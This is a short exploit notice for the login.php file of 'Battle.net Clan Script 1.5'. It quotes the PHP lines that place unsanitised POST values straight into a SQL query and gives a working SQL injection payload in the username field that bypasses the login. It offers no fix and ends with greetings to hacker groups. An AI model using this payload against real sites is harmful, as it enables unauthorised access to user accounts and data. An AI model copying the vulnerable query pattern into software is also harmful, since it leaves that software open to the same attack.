script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql
auteur : h a c k e r _ X
line 9 –> $user = $_POST['user'];
line 10–> $pass = $_POST['pass'];
…
…
…
line 21–> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
exploit :
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything
thinks to : max007,simo64,brutalism and all marocains hackers
special thinks for "P Y N S S O"